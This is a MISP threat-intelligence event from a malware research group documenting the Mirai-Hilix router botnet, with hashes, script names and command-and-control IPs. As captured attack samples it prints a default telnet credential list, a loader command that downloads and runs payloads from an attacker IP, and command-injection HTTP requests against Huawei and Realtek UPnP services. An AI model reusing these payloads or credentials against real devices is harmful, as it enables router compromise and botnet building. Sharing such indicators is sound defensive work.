357 lines
No EOL
17 KiB
JSON
357 lines
No EOL
17 KiB
JSON
{
|
|
"Event": {
|
|
"analysis": "2",
|
|
"date": "2020-05-14",
|
|
"extends_uuid": "508411ea-0680-428f-b6e7-183070db547e",
|
|
"info": "Linux/Mirai-Hilix (w/New TABLE encoder) aims Realtek & Huawei routers",
|
|
"publish_timestamp": "1589487314",
|
|
"published": true,
|
|
"threat_level_id": "3",
|
|
"timestamp": "1589487271",
|
|
"uuid": "5ebd9f11-4628-4dc2-abaf-4d54950d210f",
|
|
"Orgc": {
|
|
"name": "MalwareMustDie",
|
|
"uuid": "569e04b2-efd0-45bd-b83a-4f7b950d210f"
|
|
},
|
|
"Tag": [
|
|
{
|
|
"colour": "#ffffff",
|
|
"local": false,
|
|
"name": "tlp:white",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#3a7300",
|
|
"local": false,
|
|
"name": "circl:incident-classification=\"malware\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#22681c",
|
|
"local": false,
|
|
"name": "malware_classification:malware-category=\"Botnet\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#ff0000",
|
|
"local": false,
|
|
"name": "Mirai",
|
|
"relationship_type": ""
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Internal reference",
|
|
"comment": "Technical announcement and analysis report",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485800",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "5ebda0e8-d424-4544-accb-4540950d210f",
|
|
"value": "https://www.virustotal.com/gui/file/a7f3670b9720fd2092d0cd0f52b46fecd431d442a9bff6ec8839e854147b7c53/community"
|
|
},
|
|
{
|
|
"category": "Internal reference",
|
|
"comment": "Technical announcement and analysis report",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485800",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "5ebda0e8-733c-4f46-a368-4b7e950d210f",
|
|
"value": "https://old.reddit.com/r/LinuxMalware/comments/gj1x02/linuxmirai_hilix/"
|
|
},
|
|
{
|
|
"category": "Internal reference",
|
|
"comment": "Technical announcement and analysis report",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485800",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "5ebda0e8-c404-4fa2-a2ba-48a0950d210f",
|
|
"value": "https://imgur.com/a/lWbs6T1"
|
|
},
|
|
{
|
|
"category": "Internal reference",
|
|
"comment": "Technical announcement and analysis report",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485800",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "5ebda0e8-b39c-4e34-8fde-48f7950d210f",
|
|
"value": "https://twitter.com/malwaremustd1e/status/1260582039503417344"
|
|
},
|
|
{
|
|
"category": "Payload installation",
|
|
"comment": "Linux/Mirai Hilix new encoder hashes",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485980",
|
|
"to_ids": false,
|
|
"type": "md5",
|
|
"uuid": "5ebda19c-1004-4b99-af52-4bcb950d210f",
|
|
"value": "7a5e717aa86fd986d9aef089c6e07bcd"
|
|
},
|
|
{
|
|
"category": "Payload installation",
|
|
"comment": "Linux/Mirai Hilix new encoder hashes",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485981",
|
|
"to_ids": false,
|
|
"type": "md5",
|
|
"uuid": "5ebda19d-5838-41fe-a455-481a950d210f",
|
|
"value": "8293c25c4c759654ea72342750a91170"
|
|
},
|
|
{
|
|
"category": "Payload installation",
|
|
"comment": "Linux/Mirai Hilix new encoder hashes",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485981",
|
|
"to_ids": false,
|
|
"type": "md5",
|
|
"uuid": "5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f",
|
|
"value": "94008c192bd62432fbacede828e2c497"
|
|
},
|
|
{
|
|
"category": "Payload installation",
|
|
"comment": "Linux/Mirai Hilix new encoder hashes",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485981",
|
|
"to_ids": false,
|
|
"type": "md5",
|
|
"uuid": "5ebda19d-39e8-459b-8128-458e950d210f",
|
|
"value": "749d282b6ff9e1b9390201173af694c0"
|
|
},
|
|
{
|
|
"category": "Payload installation",
|
|
"comment": "Linux/Mirai Hilix new encoder hashes",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485981",
|
|
"to_ids": false,
|
|
"type": "md5",
|
|
"uuid": "5ebda19d-ea98-4dd8-bda1-4847950d210f",
|
|
"value": "34307f52ba4a81d94058c130df146c5a"
|
|
},
|
|
{
|
|
"category": "Payload installation",
|
|
"comment": "Linux/Mirai Hilix new encoder hashes",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485981",
|
|
"to_ids": false,
|
|
"type": "md5",
|
|
"uuid": "5ebda19d-60e0-4e0c-a372-45c1950d210f",
|
|
"value": "84d45afab65260068009911871f5babd"
|
|
},
|
|
{
|
|
"category": "Payload installation",
|
|
"comment": "Linux/Mirai Hilix new encoder hashes",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589485981",
|
|
"to_ids": false,
|
|
"type": "md5",
|
|
"uuid": "5ebda19d-71f4-4308-baa0-4fe2950d210f",
|
|
"value": "ec413215dc385d95e1c89d9bda44de4d"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix loader script filename",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486100",
|
|
"to_ids": false,
|
|
"type": "filename",
|
|
"uuid": "5ebda214-8710-467a-aa11-4de1950d210f",
|
|
"value": "Hilix.sh"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix loader script filename",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486100",
|
|
"to_ids": false,
|
|
"type": "filename",
|
|
"uuid": "5ebda214-08f8-4218-bc78-42a6950d210f",
|
|
"value": "Hilix1.sh"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix loader script filename",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486100",
|
|
"to_ids": false,
|
|
"type": "filename",
|
|
"uuid": "5ebda214-89a0-452e-8f30-4874950d210f",
|
|
"value": "Hilix2.sh"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix loader script filename",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486100",
|
|
"to_ids": false,
|
|
"type": "filename",
|
|
"uuid": "5ebda214-02e4-4f15-8e44-4feb950d210f",
|
|
"value": "Hilix3.sh"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix loader script filename",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486100",
|
|
"to_ids": false,
|
|
"type": "filename",
|
|
"uuid": "5ebda214-b6e4-4cf5-a789-46a7950d210f",
|
|
"value": "Hilix4.sh"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix's C2 servers, payload servers & Infection scanner servers (LRAB base), see reference.",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-13T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486323",
|
|
"to_ids": false,
|
|
"type": "ip-src",
|
|
"uuid": "5ebda2f3-d320-4e88-b43c-4c03950d210f",
|
|
"value": "142.93.217.221"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix's C2 servers, payload servers & Infection scanner servers (LRAB base), see reference.",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-13T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486323",
|
|
"to_ids": false,
|
|
"type": "ip-src",
|
|
"uuid": "5ebda2f3-d174-41d1-a36e-44cb950d210f",
|
|
"value": "159.203.44.33"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix's C2 servers, payload servers & Infection scanner servers (LRAB base), see reference.",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-13T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486323",
|
|
"to_ids": false,
|
|
"type": "ip-src",
|
|
"uuid": "5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
|
|
"value": "194.180.224.124"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix's C2 servers, payload servers & Infection scanner servers (LRAB base), see reference.",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-13T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486324",
|
|
"to_ids": false,
|
|
"type": "ip-src",
|
|
"uuid": "5ebda2f4-5bdc-49d3-bd46-4829950d210f",
|
|
"value": "194.180.224.150"
|
|
},
|
|
{
|
|
"category": "Targeting data",
|
|
"comment": "Linux/Mirai Hilix targeted products (telnet default password)",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486529",
|
|
"to_ids": false,
|
|
"type": "comment",
|
|
"uuid": "5ebda3c1-a0e4-41db-a6a5-43ee950d210f",
|
|
"value": "\"root\",\"xc3511\"\r\n\"root\",\"xc3518\"\r\n\"root\",\"xc3515\"\r\n\"vstarcam2015\",\"20150602\"\r\n\"admin\",\"admin\"\r\n\"root\",\"zte9x15\"\r\n\"root\",\"vizxv\"\r\n\"root\",\"admin\"\r\n\"root\",\"vertex25ektks123\"\r\n\"admin\",\"vertex25ektks123\"\r\n\"root\",\"Zte521\"\r\n\"default\"\r\n\"default\",\"OxhlwSG8\"\r\n\"default\",\"S2fGqNFs\"\r\n\"default\",\"lJwpbo6\"\r\n\"default\",\"antslq\"\r\n\"guest\",\"xc3511\"\r\n\"admin\",\"aquario\"\r\n\"support\",\"support\"\r\n\"admin\",\"password\"\r\n\"user\",\"user\"\r\n\"admin\",\"admin1234\"\r\n\"admin\",\"1111\"\r\n\"guest\",\"guest\"\r\n\"guest\",\"12345\"\r\n\"admin\",\"1234\"\r\n\"admin\",\"ipcam_rt5350\"\r\n\"root\",\"ipcam_rt5350\"\r\n\"admin\",\"ho4uku6at\"\r\n\"admin\",\"kont2004\"\r\n\"admin\",\"Win1doW$ \"\r\n\"root\",\"hunt5759\"\r\n\"admin\",\"COadmin123\"\r\n\"admin\",\"ZmqVfoSIP\"\r\n\"root\",\"3ep5w2u\""
|
|
},
|
|
{
|
|
"category": "Payload installation",
|
|
"comment": "Linux/Mirai Hilix loader script injection (bruteforce default password)",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486673",
|
|
"to_ids": false,
|
|
"type": "comment",
|
|
"uuid": "5ebda451-d9f4-47c6-b3d5-4ce5950d210f",
|
|
"value": "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/Hilix.sh; curl -O http://194.180.224.124/Hilix.sh; chmod 777 Hilix.sh; sh Hilix.sh; tftp 194.180.224.124 -c get Hilix3.sh; chmod 777 Hilix3.sh; sh Hilix3.sh; tftp -r Hilix2.sh -g 194.180.224.124; chmod 777 Hilix2.sh; sh Hilix2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.124 Hilix1.sh Hilix1.sh; sh Hilix1.sh; rm -rf Hilix.sh Hilix3.sh Hilix2.sh Hilix1.sh; rm -rf *; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/bins/Hilix.x86 -O /tmp/Hilix; chmod +x /tmp/Hilix; /tmp/Hilix sbot.x86"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Linux/Mirai Hilix loader's infection script injection (Realtek, Huawei routers vulnerabilities)",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589486864",
|
|
"to_ids": false,
|
|
"type": "comment",
|
|
"uuid": "5ebda510-e6b4-49ac-b728-422c950d210f",
|
|
"value": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\\r\\nContent-Length: 430\\r\\nConnection: keep-alive\\r\\nAccept: */\u00ef\u00bc\u0160\\r\\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\\r\\n\\r\\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 159.203.44.33 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\\r\\n\\r\\n\r\n\r\nPOST /picdesc.xml HTTP/1.1\\r\\nHost: 127.0.0.1:52869\\r\\nContent-Length: 630\\r\\nAccept-Encoding: gzip, deflate\\r\\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\\r\\nAccept: */*\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\nConnection: keep-alive\\r\\n\\r\\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\\r\\n\\r\\n\r\n\r\n\r\nPOST /wanipcn.xml HTTP/1.1\\r\\nHost: 127.0.0.1:52869\\r\\nContent-Length: 630\\r\\nAccept-Encoding: gzip, deflate\\r\\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\\r\\nAccept: */*\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\nConnection: keep-alive\\r\\n\\r\\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\\r\\n\\r\\n"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Linux/Mirai Hilix DDoS attack methods",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"first_seen": "2020-05-12T00:00:00+00:00",
|
|
"last_seen": "2020-05-15T00:00:00+00:00",
|
|
"timestamp": "1589487163",
|
|
"to_ids": false,
|
|
"type": "comment",
|
|
"uuid": "5ebda63b-a5b4-4b74-9ca1-4130950d210f",
|
|
"value": "attack_method_greip\r\nattack_method_greeth\r\nattack_method_std\r\nattack_method_tcpsyn\r\nattack_method_tcpack\r\nattack_method_tcpstomp\r\nattack_method_tcpxmas\r\nattack_method_udpgeneric\r\nattack_method_udpvse\r\nattack_method_udpdns\r\nattack_method_udpplain"
|
|
}
|
|
]
|
|
}
|
|
} |